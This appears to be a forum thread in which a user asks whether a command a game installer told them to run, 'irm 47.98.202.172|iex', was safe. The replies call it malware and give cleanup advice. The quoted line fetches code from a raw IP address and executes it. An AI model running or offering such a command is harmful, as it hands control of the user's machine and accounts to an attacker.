I recently bought a game online, and during the installation, it prompted me for a command: "irm 47.98.202.172|iex". After I entered it, I received a "write host failed" message and wasn't redirected to Steam. Now I'm worried that something might be wrong with my computer. Can anyone help me understand if this command is safe?

What's the name of the game? There have been cases where gray market games use tricks like this. You might want to check if others have reported similar issues.

You need to report that game to Steam. It's astonishing that it was even allowed on the platform, considering they would never ask to run commands like that. Don't ignore this, check your accounts and consider changing your passwords right away.

It's definitely not safe! Legitimate games won't ever ask for a command like that. The IP address you're seeing is even flagged as suspicious and originates from China. It looks like it's trying to run malware on your system, so you might need to take some serious precautions now.

This is a classic phishing attempt! If you ran that command, your computer might be compromised. Make sure to back up important files safely, format your drive, and reinstall everything carefully. Stay cautious about entering unknown commands in the future!

Running that type of command is risky! It's likely that you've been scammed. You should think about getting your device checked for malware, and since you might have clicked on something shady, it could be best to reset your system.
